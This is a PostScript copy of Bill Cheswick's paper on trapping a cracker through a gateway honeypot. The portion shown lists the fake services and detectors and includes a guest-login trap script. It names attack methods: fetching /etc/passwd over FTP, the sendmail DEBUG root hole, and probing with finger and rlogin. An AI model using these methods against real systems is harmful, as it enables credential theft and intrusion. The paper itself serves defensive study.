DataMuseum.dk

top - metrics - download

    Length: 84724 (0x14af4)
    Types: TextFile
    Names: »b.cheswick-An_evening_with_Berferd.ps«

└─⟦4f9d7c866⟧ Bits:30007245 EUUGD6: Sikkerheds distributionen
    └─⟦this⟧ »./papers/General_Unix/b.cheswick-An_evening_with_Berferd.ps« 

TextFile

%!

%!PS-Adobe-2.0
%%Creator: dvips 5.47 Copyright 1986-91 Radical Eye Software
%%Title: /tmp/lp60329.dvi
%%Pages: 11 1
%%BoundingBox: 0 0 612 792
%%DocumentFonts: Times-Bold Times-Roman Times-Italic Courier
%%EndComments
%%BeginProcSet: texc.pro
/TeXDict 200 dict def TeXDict begin /N /def load def /B{bind def}N /S /exch
load def /X{S N}B /TR /translate load N /isls false N /vsize 10 N /@rigin{
isls{[0 1 -1 0 0 0]concat}if 72 Resolution div 72 VResolution div neg scale
Resolution VResolution vsize neg mul TR matrix currentmatrix dup dup 4 get
round 4 exch put dup dup 5 get round 5 exch put setmatrix}N /@letter{/vsize 10
N}B /@landscape{/isls true N /vsize -1 N}B /@a4{/vsize 10.6929133858 N}B /@a3{
/vsize 15.5531 N}B /@ledger{/vsize 16 N}B /@legal{/vsize 13 N}B /@manualfeed{
statusdict /manualfeed true put}B /@copies{/#copies X}B /FMat[1 0 0 -1 0 0]N
/FBB[0 0 0 0]N /nn 0 N /IE 0 N /ctr 0 N /df-tail{/nn 8 dict N nn begin
/FontType 3 N /FontMatrix fntrx N /FontBBox FBB N string /base X array
/BitMaps X /BuildChar{CharBuilder}N /Encoding IE N end dup{/foo setfont}2
array copy cvx N load 0 nn put /ctr 0 N[}B /df{/sf 1 N /fntrx FMat N df-tail}
B /dfs{div /sf X /fntrx[sf 0 0 sf neg 0 0]N df-tail}B /E{pop nn dup definefont
setfont}B /ch-width{ch-data dup length 5 sub get}B /ch-height{ch-data dup
length 4 sub get}B /ch-xoff{128 ch-data dup length 3 sub get sub}B /ch-yoff{
ch-data dup length 2 sub get 127 sub}B /ch-dx{ch-data dup length 1 sub get}B
/ch-image{ch-data dup type /stringtype ne{ctr get /ctr ctr 1 add N}if}B /id 0
N /rw 0 N /rc 0 N /gp 0 N /cp 0 N /G 0 N /sf 0 N /CharBuilder{save 3 1 roll S
dup /base get 2 index get S /BitMaps get S get /ch-data X pop /ctr 0 N ch-dx 0
ch-xoff ch-yoff ch-height sub ch-xoff ch-width add ch-yoff setcachedevice
ch-width ch-height true[1 0 0 -1 -.1 ch-xoff sub ch-yoff .1 add]/id ch-image N
/rw ch-width 7 add 8 idiv string N /rc 0 N /gp 0 N /cp 0 N{rc 0 ne{rc 1 sub
/rc X rw}{G}ifelse}imagemask restore}B /G{{id gp get /gp gp 1 add N dup 18 mod
S 18 idiv pl S get exec}loop}B /adv{cp add /cp X}B /chg{rw cp id gp 4 index
getinterval putinterval dup gp add /gp X adv}B /nd{/cp 0 N rw exit}B /lsh{rw
cp 2 copy get dup 0 eq{pop 1}{dup 255 eq{pop 254}{dup dup add 255 and S 1 and
or}ifelse}ifelse put 1 adv}B /rsh{rw cp 2 copy get dup 0 eq{pop 128}{dup 255
eq{pop 127}{dup 2 idiv S 128 and or}ifelse}ifelse put 1 adv}B /clr{rw cp 2
index string putinterval adv}B /set{rw cp fillstr 0 4 index getinterval
putinterval adv}B /fillstr 18 string 0 1 17{2 copy 255 put pop}for N /pl[{adv
1 chg}bind{adv 1 chg nd}bind{1 add chg}bind{1 add chg nd}bind{adv lsh}bind{
adv lsh nd}bind{adv rsh}bind{adv rsh nd}bind{1 add adv}bind{/rc X nd}bind{1
add set}bind{1 add clr}bind{adv 2 chg}bind{adv 2 chg nd}bind{pop nd}bind]N /D{
/cc X dup type /stringtype ne{]}if nn /base get cc ctr put nn /BitMaps get S
ctr S sf 1 ne{dup dup length 1 sub dup 2 index S get sf div put}if put /ctr
ctr 1 add N}B /I{cc 1 add D}B /bop{userdict /bop-hook known{bop-hook}if /SI
save N @rigin 0 0 moveto}N /eop{clear SI restore showpage userdict /eop-hook
known{eop-hook}if}N /@start{userdict /start-hook known{start-hook}if
/VResolution X /Resolution X 1000 div /DVImag X /IE 256 array N 0 1 255{IE S 1
string dup 0 3 index put cvn put}for}N /p /show load N /RMat[1 0 0 -1 0 0]N
/BDot 260 string N /rulex 0 N /ruley 0 N /v{/ruley X /rulex X V}B /V
statusdict begin /product where{pop product dup length 7 ge{0 7 getinterval
(Display)eq}{pop false}ifelse}{false}ifelse end{{gsave TR -.1 -.1 TR 1 1 scale
rulex ruley false RMat{BDot}imagemask grestore}}{{gsave TR -.1 -.1 TR rulex
ruley scale 1 1 false RMat{BDot}imagemask grestore}}ifelse B /a{moveto}B
/delta 0 N /tail{dup /delta X 0 rmoveto}B /M{S p delta add tail}B /b{S p tail}
B /c{-4 M}B /d{-3 M}B /e{-2 M}B /f{-1 M}B /g{0 M}B /h{1 M}B /i{2 M}B /j{3 M}B
/k{4 M}B /w{0 rmoveto}B /l{p -4 w}B /m{p -3 w}B /n{p -2 w}B /o{p -1 w}B /q{p 1
w}B /r{p 2 w}B /s{p 3 w}B /t{p 4 w}B /x{0 S rmoveto}B /y{3 2 roll p a}B /bos{
/SS save N}B /eos{clear SS restore}B end
%%EndProcSet
%%BeginProcSet: texps.pro
TeXDict begin /rf{655360 div mul Resolution mul 7227 div /PixPerEm X findfont
dup length 1 add dict /nn X{1 index /FID ne{nn 3 1 roll put}{pop pop}ifelse}
forall 256 dict begin nn /Encoding get 0 1 255{2 copy get 3 index 2 index get
1000 mul PixPerEm div def pop}for pop pop nn /Metrics currentdict put end
/fontname X /nn dup nn definefont[PixPerEm 0 0 PixPerEm neg 0 0]makefont N
fontname{/foo setfont}2 array copy cvx N fontname load 0 nn put}N
/ObliqueSlant{dup sin S cos div neg}B /SlantFont{/foo X[1 0 foo 1 0 0]
TransFont}N /ExtendFont{/foo X 3 2 roll[S{foo div}forall]3 1 roll[foo 0 0 1 0
0]TransFont}N /TransFont{S findfont S makefont dup length dict /nn X{1 index
/FID ne{nn 3 1 roll put}{pop pop}ifelse}forall dup nn definefont pop}N end
%%EndProcSet
%%BeginProcSet: special.pro
TeXDict begin /SDict 200 dict N SDict begin /@SpecialDefaults{/hs 612 N /vs
792 N /ho 0 N /vo 0 N /hsc 1 N /vsc 1 N /ang 0 N /CLIP false N /BBcalc false N
/p 3 def}B /@scaleunit 100 N /@hscale{@scaleunit div /hsc X}B /@vscale{
@scaleunit div /vsc X}B /@hsize{/hs X /CLIP true N}B /@vsize{/vs X /CLIP true
N}B /@hoffset{/ho X}B /@voffset{/vo X}B /@angle{/ang X}B /@rwi{10 div /rwi X}
B /@llx{/llx X}B /@lly{/lly X}B /@urx{/urx X}B /@ury{/ury X /BBcalc true N}B
/magscale true def end /@MacSetUp{userdict /md known{userdict /md get type
/dicttype eq{md begin /letter{}N /note{}N /legal{}N /od{txpose 1 0 mtx
defaultmatrix dtransform S atan/pa X newpath clippath mark{transform{
itransform moveto}}{transform{itransform lineto}}{6 -2 roll transform 6 -2
roll transform 6 -2 roll transform{itransform 6 2 roll itransform 6 2 roll
itransform 6 2 roll curveto}}{{closepath}}pathforall newpath counttomark array
astore /gc xdf pop ct 39 0 put 10 fz 0 fs 2 F/|______Courier fnt invertflag{
PaintBlack}if}N /txpose{pxs pys scale ppr aload pop por{noflips{pop S neg S TR
pop 1 -1 scale}if xflip yflip and{pop S neg S TR 180 rotate 1 -1 scale ppr 3
get ppr 1 get neg sub neg ppr 2 get ppr 0 get neg sub neg TR}if xflip yflip
not and{pop S neg S TR pop 180 rotate ppr 3 get ppr 1 get neg sub neg 0 TR}if
yflip xflip not and{ppr 1 get neg ppr 0 get neg TR}if}{noflips{TR pop pop 270
rotate 1 -1 scale}if xflip yflip and{TR pop pop 90 rotate 1 -1 scale ppr 3 get
ppr 1 get neg sub neg ppr 2 get ppr 0 get neg sub neg TR}if xflip yflip not
and{TR pop pop 90 rotate ppr 3 get ppr 1 get neg sub neg 0 TR}if yflip xflip
not and{TR pop pop 270 rotate ppr 2 get ppr 0 get neg sub neg 0 S TR}if}
ifelse scaleby96{ppr aload pop 4 -1 roll add 2 div 3 1 roll add 2 div 2 copy
TR .96 dup scale neg S neg S TR}if}N /cp{pop pop showpage pm restore}N end}if}
if}N /normalscale{Resolution 72 div VResolution 72 div neg scale magscale{
DVImag dup scale}if}N /psfts{S 65536 div N}N /startTexFig{/psf$SavedState save
N userdict maxlength dict begin /magscale false def normalscale currentpoint
TR /psf$ury psfts /psf$urx psfts /psf$lly psfts /psf$llx psfts /psf$y psfts
/psf$x psfts currentpoint /psf$cy X /psf$cx X /psf$sx psf$x psf$urx psf$llx
sub div N /psf$sy psf$y psf$ury psf$lly sub div N psf$sx psf$sy scale psf$cx
psf$sx div psf$llx sub psf$cy psf$sy div psf$ury sub TR /showpage{}N
/erasepage{}N /copypage{}N /p 3 def @MacSetUp}N /doclip{psf$llx psf$lly
psf$urx psf$ury currentpoint 6 2 roll newpath 4 copy 4 2 roll moveto 6 -1 roll
S lineto S lineto S lineto closepath clip newpath moveto}N /endTexFig{end
psf$SavedState restore}N /@beginspecial{SDict begin /SpecialSave save N gsave
normalscale currentpoint TR @SpecialDefaults}N /@setspecial{CLIP{newpath 0 0
moveto hs 0 rlineto 0 vs rlineto hs neg 0 rlineto closepath clip}if ho vo TR
hsc vsc scale ang rotate BBcalc{rwi urx llx sub div dup scale llx neg lly neg
TR}if /showpage{}N /erasepage{}N /copypage{}N newpath}N /@endspecial{grestore
clear SpecialSave restore end}N /@defspecial{SDict begin}N /@fedspecial{end}B
/li{lineto}B /rl{rlineto}B /rc{rcurveto}B /np{/SaveX currentpoint /SaveY X N 1
setlinecap newpath}N /st{stroke SaveX SaveY moveto}N /fil{fill SaveX SaveY
moveto}N /ellipse{/endangle X /startangle X /yrad X /xrad X /savematrix matrix
currentmatrix N TR xrad yrad scale 0 0 1 startangle endangle arc savematrix
setmatrix}N end
%%EndProcSet
TeXDict begin 1000 300 300 @start /Fa [ 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 8 11 14 17 17 28
26 11 11 11 17 19 8 11 8 9 17 17 17 17 17 17 17 17 17 17 9
9 19 19 19 15 31 24 22 22 24 20 18 24 24 11 13 24 20 30 24
24 18 24 22 18 20 24 24 31 24 24 20 11 9 11 16 17 11 15 17
15 17 15 11 17 17 9 9 17 9 26 17 17 17 17 11 13 9 17 17 24
17 17 15 16 7 16 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 11 17 17 6 17 17 17 17 6 15 17
11 11 18 18 0 17 17 17 8 0 15 12 11 15 15 17 33 33 0 15 0 11
11 11 11 11 11 11 11 0 11 11 0 11 11 11 33 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 30 0 9 0 0 0 0 20 24 30 10 0 0 0 0 0 22 0 0
0 9 0 0 9 17 24 17 0 0 0 0 ] /Times-Roman 1000 524288 rf /Fb
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
22 22 22 22 22 22 22 22 22 22 22 22 22 0 0 0 22 22 22 22 0
22 22 22 22 22 22 22 0 0 22 0 22 22 22 22 22 22 22 22 0 22
22 0 22 22 22 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 22 0 0
0 0 22 22 0 22 0 0 0 0 0 0 0 0 0 22 0 0 22 22 0 22 0 0 0 0
] /Courier 1000 589824 rf /Fc [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 25 25 25 25 25 25 25 25 25
25 25 25 0 0 0 25 25 25 25 0 25 25 25 25 25 25 25 0 0 25 0
25 25 25 25 25 25 25 25 0 25 25 0 25 25 25 25 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 25 0 0 0 0 25 25 0 25 0 0 0 0 0 0 0 0
0 25 0 0 25 25 0 25 0 0 0 0 ] /Courier 1000 655360 rf /Fd 1
16 df<EA03C0EA0FF0EA1FF8EA3FFCEA7FFEA2B5FCA4EA7FFEA2EA3FFCEA1FF8EA0FF0EA03C010
107E9115>15 D E /Fe [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 10 14 17 21 21 35 32 14 14 14 21
28 10 14 10 12 21 21 21 21 21 21 21 21 21 21 14 14 28 28 28
21 38 25 25 28 30 25 25 30 30 14 18 28 23 35 28 30 25 30 25
21 23 30 25 35 25 23 23 16 12 16 18 21 14 21 21 18 21 18 12
21 21 12 12 18 12 30 21 21 21 21 16 16 12 21 18 28 18 18 16
17 11 17 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 16 21 21 7 21 21 21 21 9 23 21 14 14 21
21 0 21 21 21 10 0 22 15 14 23 23 21 37 42 0 21 0 14 14 14
14 14 14 14 14 0 14 14 0 14 14 14 37 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 37 0 11 0 0 0 0 23 30 39 13 0 0 0 0 0 28 0 0 0 12
0 0 12 21 28 21 0 0 0 0 ] /Times-Italic 1000 655360 rf /Ff
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 10 14 17 21 21 35 32 14 14 14 21 23 10 14 10 12 21 21
21 21 21 21 21 21 21 21 12 12 23 23 23 18 38 30 28 28 30 25
23 30 30 14 16 30 25 37 30 30 23 30 28 23 25 30 30 39 30 30
25 14 12 14 19 21 14 18 21 18 21 18 14 21 21 12 12 21 12 32
21 21 21 21 14 16 12 21 21 30 21 21 18 20 8 20 22 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 14
21 21 7 21 21 21 21 7 18 21 14 14 23 23 0 21 21 21 10 0 19
15 14 18 18 21 42 42 0 18 0 14 14 14 14 14 14 14 14 0 14 14
0 14 14 14 42 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 37 0 11 0 0 0
0 25 30 37 13 0 0 0 0 0 28 0 0 0 12 0 0 12 21 30 21 0 0 0 0
] /Times-Roman 1000 655360 rf /Fg [ 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 10 14 23 21 21 42 35
14 14 14 21 24 10 14 10 12 21 21 21 21 21 21 21 21 21 21 14
14 24 24 24 21 39 30 28 30 30 28 25 32 32 16 21 32 28 39 30
32 25 32 30 23 28 30 30 42 30 30 28 14 12 14 24 21 14 21 23
18 23 18 14 21 23 12 14 23 12 35 23 21 23 23 18 16 14 23 21
30 21 21 18 16 9 16 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 14 21 21 7 21 21 21 21 12 21
21 14 14 23 23 0 21 21 21 10 0 22 15 14 21 21 21 42 42 0 21
0 14 14 14 14 14 14 14 14 0 14 14 0 14 14 14 42 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 42 0 12 0 0 0 0 28 32 42 14 0 0 0 0 0 30
0 0 0 12 0 0 12 21 30 23 0 0 0 0 ] /Times-Bold 1000 655360
rf /Fh [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 12 17 28 25 25 50 41 17 17 17 25 28 12 17 12
14 25 25 25 25 25 25 25 25 25 25 17 17 28 28 28 25 46 36 33
36 36 33 30 39 39 19 25 39 33 47 36 39 30 39 36 28 33 36 36
50 36 36 33 17 14 17 29 25 17 25 28 22 28 22 17 25 28 14 17
28 14 41 28 25 28 28 22 19 17 28 25 36 25 25 22 20 11 20 26
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 17 25 25 8 25 25 25 25 14 25 25 17 17 28 28 0 25 25
25 12 0 27 17 17 25 25 25 50 50 0 25 0 17 17 17 17 17 17 17
17 0 17 17 0 17 17 17 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 50
0 15 0 0 0 0 33 39 50 16 0 0 0 0 0 36 0 0 0 14 0 0 14 25 36
28 0 0 0 0 ] /Times-Bold 1000 786432 rf /Fi [ 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 15 19 32
29 29 58 48 19 19 19 29 33 15 19 15 16 29 29 29 29 29 29 29
29 29 29 19 19 33 33 33 29 54 42 39 42 42 39 36 45 45 23 29
45 39 55 42 45 36 45 42 32 39 42 42 58 42 42 39 19 16 19 34
29 19 29 32 26 32 26 19 29 32 16 19 32 16 48 32 29 32 32 26
23 19 32 29 42 29 29 26 23 13 23 30 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 19 29 29 10 29
29 29 29 16 29 29 19 19 32 32 0 29 29 29 15 0 31 20 19 29 29
29 58 58 0 29 0 19 19 19 19 19 19 19 19 0 19 19 0 19 19 19
58 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 58 0 17 0 0 0 0 39 45 58
19 0 0 0 0 0 42 0 0 0 16 0 0 16 29 42 32 0 0 0 0 ] /Times-Bold
1000 917504 rf end
%%EndProlog
%%BeginSetup
%%Feature: *Resolution 300
TeXDict begin 
%%EndSetup
%%Page: 1 1
bop 663 169 a Fi(An)14 b(Evening)h(with)h(Berferd)327 243 y(In)e(Which)i(a)e
(Cracker)g(is)h(Lur)o(ed,)f(Endur)o(ed,)g(and)h(Studied)829
367 y Fh(Bill)d(Cheswick)713 467 y(A)l(T&T)h(Bell)g(Laboratories)898
659 y Fg(Abstract)0 751 y Ff(On)d(7)h(January)f(1991)g(a)h(cracker)n(,)i
(believing)c(he)i(had)f(discovered)h(the)f(famous)h(sendmail)f(DEBUG)h(hole)f
(in)g(our)g(Internet)g(gateway)0 801 y(machine,)h(attempted)f(to)g(obtain)f
(a)i(copy)f(of)g(our)g(password)g(\256le.)15 b(I)c(sent)f(him)g(one.)0
869 y(For)h(several)i(months)d(we)i(led)g(this)f(cracker)h(on)f(a)i(merry)e
(chase)i(in)e(order)g(to)g(trace)i(his)e(location)f(and)i(learn)f(his)g
(techniques.)19 b(This)0 919 y(paper)12 b(is)f(a)h(chronicle)f(of)h(the)f
(cracker)r(')n(s)h(\252successes\272)j(and)c(disappointments,)g(the)g(bait)g
(and)g(traps)h(used)g(to)e(lure)i(and)f(detect)h(him,)0 969
y(and)e(the)g(chroot)g(\252Jail\272)h(we)g(built)d(to)i(watch)g(his)g
(activities.)0 1036 y(W)m(e)15 b(concluded)g(that)f(our)g(cracker)i(had)f(a)g
(lot)f(of)h(time)f(and)h(persistence,)i(and)e(a)g(good)f(list)g(of)g
(security)h(holes)f(to)g(use)i(once)f(he)0 1086 y(obtained)10
b(a)h(login)f(on)g(a)i(machine.)18 b(W)n(ith)10 b(these)i(holes)e(he)h(could)
g(often)f(subvert)g(the)h Fe(uucp)g Ff(and)g Fe(bin)f Ff(accounts)h(in)f
(short)h(order)n(,)g(and)0 1136 y(then)f Fe(r)n(oot)p Ff(.)15
b(Our)10 b(cracker)i(was)f(interested)e(in)h(military)f(tar)o(gets)h(and)h
(new)f(machines)h(to)f(help)g(launder)g(his)f(connections.)0
1318 y Fg(1.)21 b(Intr)o(oduction)83 1414 y Ff(Our)8 b(secure)h(Internet)e
(gateway)h(was)h(\256rmly)e(in)h(place)g(by)g(the)f(spring)g(of)h(1990[1)n
(].)15 b(W)n(ith)7 b(the)h(castle)h(gate)f(in)f(place,)i(I)f(wondered)0
1463 y(how)k(often)f(the)h(lock)g(was)g(tried.)20 b(I)12 b(knew)g(there)g
(were)h(barbarians)f(out)f(there.)21 b(Who)12 b(were)g(they?)20
b(Where)13 b(did)e(they)h(attack)g(from)0 1513 y(and)e(how)g(often?)15
b(What)10 b(security)g(holes)g(did)f(they)h(try?)k(They)d(weren')o(t)f(doing)
f(any)h(damage)i(to)d(A)-5 b(T&T)m(,)12 b(merely)f(\256ddling)d(with)h(the)0
1563 y(door)n(.)15 b(The)c(ultimate)f(fun)g(would)g(be)h(to)f(lure)g(a)h
(cracker)h(into)d(a)i(situation)e(where)i(we)g(log)f(his)g(sessions,)h(learn)
g(a)g(thing)e(or)i(two,)f(and)0 1613 y(warn)g(his)g(subsequent)g(tar)o(gets.)
0 1681 y(The)f(owner)g(of)f(an)h(average)h(workstation)d(on)h(the)h(Internet)
f(has)h(few)g(tools)e(for)h(answering)h(these)g(questions.)14
b(Commercial)9 b(systems)0 1730 y(detect)k(and)g(report)f(some)i(probes,)f
(but)f(ignore)g(many)h(others.)23 b(Our)12 b(gateway)h(was)h(producing)d(10)h
(megabytes)i(of)e(detailed)h(logs)0 1780 y(each)e(day)g(for)f(the)g(standard)
g(services.)16 b(How)10 b(often)f(were)j(people)e(trying)e(to)i(use)g(the)h
(services)g(we)f(did)g(not)f(support?)0 1848 y(W)m(e)14 b(added)g(a)g(few)g
(fake)h(services,)g(and)f(I)g(wrote)f(a)i(script)e(to)g(scan)h(the)g(logs)f
(daily)m(.)25 b(This)14 b(list)e(of)i(services)g(and)g(other)f(lures)h(has)0
1898 y(grown\320we)9 b(now)h(check)h(the)f(following:)42 1999
y Fd(\017)20 b Fe(FTP:)13 b Ff(The)g(scanner)f(produces)g(a)h(report)e(of)h
(all)g(login)e(names)j(that)f(were)h(attempted.)20 b(It)12
b(also)g(reports)f(the)h(use)g(of)g(a)h(tilde)e(\(a)83 2048
y(possible)h(probe)h(of)g(an)g(old)f(FTP)i(bug\),)f(all)g(attempts)g(to)f
(obtain)g(FTP')n(s)h Fc(/etc/passwd)f Ff(and)h Fc(/etc/group)g
Ff(\256les,)h(and)83 2098 y(a)f(list)e(of)h(all)f(\256les)i(stored)f(in)f
(the)h Fc(pub)g Ff(directory)m(.)20 b(People)13 b(who)e(obtain)g(the)h
Fc(passwd)g Ff(\256le)h(are)g(often)e(looking)f(for)i(account)83
2148 y(names)g(to)e(try)m(,)h(and)g(password)g(entries)g(to)f(crack.)18
b(Sometimes)12 b(system)f(administrators)f(put)g(their)g(real)h(password)g
(\256le)g(in)f(the)83 2198 y(FTP)h(directory)m(.)j(W)m(e)d(have)g(a)g(bogus)e
(\256le)i(whose)f(passwords,)h(when)f(cracked,)i(are)f Fe(why)31
b(ar)n(e)h(you)f(wasting)e(your)j(time.)42 2281 y Fd(\017)20
b Fe(T)l(elnet/login:)c Ff(All)10 b(login)h(attempts)g(are)h(logged)f(and)h
(reviewed)g(daily)m(.)19 b(It)11 b(is)h(easy)g(to)f(spot)g(when)h(someone)g
(is)g(trying)e(many)83 2331 y(accounts,)h(or)f(hammering)h(on)e(a)i
(particular)f(account.)15 b(Since)c(there)f(are)h(no)f(authorized)g(accounts)
h(for)f(Internet)f(users)i(on)f(our)83 2381 y(gateway)h(other)e(than)h
Fc(guard)p Ff(,)h(it)e(is)h(easy)h(to)f(pick)g(out)f(probes.)42
2464 y Fd(\017)20 b Fe(Guest/visitor)9 b(accounts:)16 b Ff(A)11
b(public)e(computer)i(account)g(is)g(the)f(\256rst)h(thing)e(a)i(cracker)h
(looks)e(for)n(.)16 b(These)c(accounts)f(provide)83 2513 y(friendly)m(,)g
(easy)h(access)i(to)c(nearly)h(every)h(\256le)g(in)e(the)h(machine,)i
(including)c(the)j(password)f(\256le.)18 b(The)12 b(cracker)h(can)f(also)f
(get)h(a)83 2563 y(list)e(of)g(hosts)h(trusted)f(by)g(this)g(machine)h(from)g
(the)g Fc(/etc/hosts.equiv)e Ff(and)i(various)f(personal)h
Fc(.rhosts)f Ff(\256les.)17 b(Our)83 2613 y(login)9 b(script)g(for)h(these)h
(accounts)f(look)g(something)f(like)h(this:)p eop
%%Page: 2 2
bop 150 42 a Fb(exec)24 b(2>/dev/nu)q(ll)i(#)d(ensure)i(that)f(stderr)h
(doesn't)g(appear)150 81 y(trap)f("")f(1)150 120 y(/bin/echo)150
160 y(\()90 b(/bin/echo)26 b("Attempt)g(to)d(login)i(to)e(inet)h(with)47
b($LOGNAME)h(from)e($CALLER")26 b(|)441 199 y(upasname)q(=a)q(dm)g(/bin/mail)
g(ches)e(dangelo)h(&)262 239 y(#)e(\(notify)i(calling)h(machine's)g
(administra)q(to)q(r)g(for)d(some)h(machines)q(...)q(\))262
278 y(#)f(\(finger)i(the)f(calling)h(machine.)q(..\))150 318
y(\))e(2>&1)h(|)f(mail)h(ches)g(dangelo)150 396 y(/bin/echo)i("/tmp)f(full")
150 436 y(sleep)f(5)382 b(#)23 b(I)g(love)h(to)f(make)h(them)g(wait....)150
475 y(/bin/echo)i("/tmp)f(full")150 515 y(/bin/echo)h("/tmp)f(full")150
554 y(/bin/echo)150 594 y(sleep)f(60)360 b(#)23 b(...)g(and)h(simulatin)q(g)i
(a)d(busy)h(machine)h(is)e(useful)83 702 y Ff(W)m(e)10 b(have)h(to)e(be)h
(careful)h(that)e(the)h(caller)g(doesn')o(t)g(see)h(our)e(error)h(messages)i
(if)d(we)h(make)h(a)g(mistake)f(in)f(this)g(script.)15 b(Note)10
b(that)83 751 y Fc($CALLER)i Ff(is)g(the)g(name)i(or)e(IP)g(number)g(of)g
(the)g(machine)i(on)e(the)g(other)g(end.)21 b(It)12 b(is)g(available)g(to)g
(the)g(user)r(')n(s)g(environment)83 801 y(through)d(modi\256cations)g(to)h
(our)f Fe(telnetd)h Ff(and)g Fe(login)f Ff(programs.)42 884
y Fd(\017)20 b Fe(SMTP)11 b(DEBUG:)g Ff(This)f(command)i(used)f(to)f(provide)
f(a)i(couple)g(of)f(trap)g(doors)g(into)g Fe(sendmail)p Ff(.)15
b(All)10 b(the)g(vendors)g(seemed)j(to)83 934 y(clean)d(up)e(this)g(famous)h
(hole)g(quite)f(a)h(while)g(ago,)g(but)f(some)i(crackers)g(still)e(try)g(it)g
(occasionally)m(.)15 b(The)9 b(hole)g(allowed)f(outsiders)83
984 y(to)k(execute)i(a)f(shell)f(script)g(as)i Fc(root)p Ff(.)22
b(When)13 b(someone)g(tries)g(this)e(on)i(our)f(machine,)i(I)f(receive)h(the)
e(text)g(that)g(the)h(cracker)83 1034 y(wishes)d(to)g(have)h(executed.)42
1117 y Fd(\017)20 b Fe(Finger:)15 b(Finger)10 b Ff(provides)f(a)i(lot)e(of)h
(information)e(useful)i(to)f(crackers:)16 b(account)11 b(names,)g(when)f(the)
g(account)h(was)g(last)f(used,)83 1166 y(and)f(a)h(few)f(things)f(to)g(try)g
(as)i(passwords.)15 b(Since)9 b(our)g(corporate)g(policy)f(does)h(not)f
(allow)g(us)h(to)g(provide)f(this)g(information,)g(we)83 1216
y(put)i(in)h(a)h(service)g(that)e(rejects)i(the)f(call)g(after)h(\256ngering)
e(the)h(caller)n(.)18 b(\(Obviously)9 b(we)j(had)f(to)g(take)h(steps)f(to)g
(avoid)f(\256ngering)83 1266 y(loops)f(if)f(the)i(\256nger)f(came)i(from)e
(our)g(gateway)m(.\))16 b(It)9 b(turns)f(out)h(that)g(we)h(receive)g(about)f
(a)h(dozen)f(\256nger)h(requests)f(per)h(day)m(,)g(and)83 1316
y(they)i(are)h(mostly)e(legitimate.)21 b(W)m(e)12 b(now)g(print)f(useful)h
(information)e(for)i(general)h(queries,)g(but)e(mail)h(an)h(alarm)g(if)e
(someone)83 1366 y(wants)f(speci\256c)h(information)e(about)g(bogus)h
(accounts.)42 1449 y Fd(\017)20 b Fe(Rlogin/rsh:)12 b Ff(These)f(commands)f
(rely)e(on)h(a)g(notoriously)d(insecure)k(authentication)d(system,)j(which)e
(we)i(do)e(not)h(support.)k(But)83 1499 y(we)h(do)f(mail)h(reports)f(of)g
(attempts)g(to)g(use)h(them)g(along)f(with)f(reverse)j(\256nger)e
(information)f(and)i(particulars)f(like)f(the)i(user)83 1548
y(name)d(and)g(desired)f(command.)0 1649 y(Many)h(of)g(these)h(detectors)f
(perform)h(a)f(\252reverse)i Fe(\256nger)p Ff(\272)f(to)f(the)g(calling)f
(machine.)19 b(These)13 b Fe(\256nger)p Ff(s)e(can)i(often)d(locate)i(the)f
(calling)0 1699 y(user)g(on)e(a)i(busy)f(machine)h(after)f(several)h(probes,)
g(and)f(even)h(identify)d(the)j(previous)e(hop)h(on)f(a)i(laundered)f(call.)0
